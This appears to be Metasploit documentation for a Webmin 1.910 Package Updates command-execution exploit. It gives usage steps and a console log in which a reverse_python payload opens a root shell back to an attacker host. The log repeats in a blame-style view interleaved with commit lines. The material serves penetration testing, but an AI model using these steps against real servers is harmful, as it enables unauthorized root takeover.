documentation/modules/exploit/linux/http/webmin_packageup_rce.md

## Description

This module exploits an arbitrary command execution vulnerability in Webmin
1.910 and lower versions. any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.

## Vulnerable Application

This module has been tested with [Webmin 1.910](https://sourceforge.net/projects/webadmin/files/webmin/1.910/)

## Verification Steps

1. `use exploit/lunix/http/webmin_packageup_rce`
2. `set rhosts <rhost>`
3. `set username <username>`
4. `set password <password>`
5. `exploit`

## Scenarios

### Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64

```
msf >
msf > use exploit/linux/http/webmin_packageup_rce
msf exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
USERNAME => rce
msf exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
PASSWORD => password
msf exploit(linux/http/webmin_packageup_rce) > check

[*] NICE! rce has the right to >>Package Update<<
[+] 192.168.1.9:10000 - The target is vulnerable.
msf exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.12:4444 
[+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5
[*] Attempting to execute the payload...
[*] Command shell session 12 opened (192.168.1.12:4444 -> 192.168.1.9:47552) at 2019-06-16 18:21:46 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux AkkuS 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
pwd
/usr/share/webmin/package-updates/
exit
```
Adding module documentation 2019-06-16 18:27:01 -04:00			`## Description`

			`This module exploits an arbitrary command execution vulnerability in Webmin`
			`1.910 and lower versions. any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.`

			`## Vulnerable Application`

			`This module has been tested with [Webmin 1.910](https://sourceforge.net/projects/webadmin/files/webmin/1.910/)`

			`## Verification Steps`

			1. `use exploit/lunix/http/webmin_packageup_rce`
			2. `set rhosts <rhost>`
			3. `set username <username>`
			4. `set password <password>`
			5. `exploit`

			`## Scenarios`

			`### Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64`

			```
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf >`
			`msf > use exploit/linux/http/webmin_packageup_rce`
			`msf exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9`
Adding module documentation 2019-06-16 18:27:01 -04:00			`RHOSTS => 192.168.1.9`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python`
Adding module documentation 2019-06-16 18:27:01 -04:00			`PAYLOAD => cmd/unix/reverse_python`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12`
Adding module documentation 2019-06-16 18:27:01 -04:00			`LHOST => 192.168.1.12`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/http/webmin_packageup_rce) > set USERNAME rce`
Adding module documentation 2019-06-16 18:27:01 -04:00			`USERNAME => rce`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/http/webmin_packageup_rce) > set PASSWORD password`
Adding module documentation 2019-06-16 18:27:01 -04:00			`PASSWORD => password`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/http/webmin_packageup_rce) > check`
Adding module documentation 2019-06-16 18:27:01 -04:00
			`[*] NICE! rce has the right to >>Package Update<<`
			`[+] 192.168.1.9:10000 - The target is vulnerable.`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/http/webmin_packageup_rce) > exploit`
Adding module documentation 2019-06-16 18:27:01 -04:00
			`[*] Started reverse TCP handler on 192.168.1.12:4444`
			`[+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5`
			`[*] Attempting to execute the payload...`
			`[*] Command shell session 12 opened (192.168.1.12:4444 -> 192.168.1.9:47552) at 2019-06-16 18:21:46 -0400`

			`id`
			`uid=0(root) gid=0(root) groups=0(root)`
			`uname -a`
			`Linux AkkuS 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux`
			`pwd`
			`/usr/share/webmin/package-updates/`
			`exit`
			```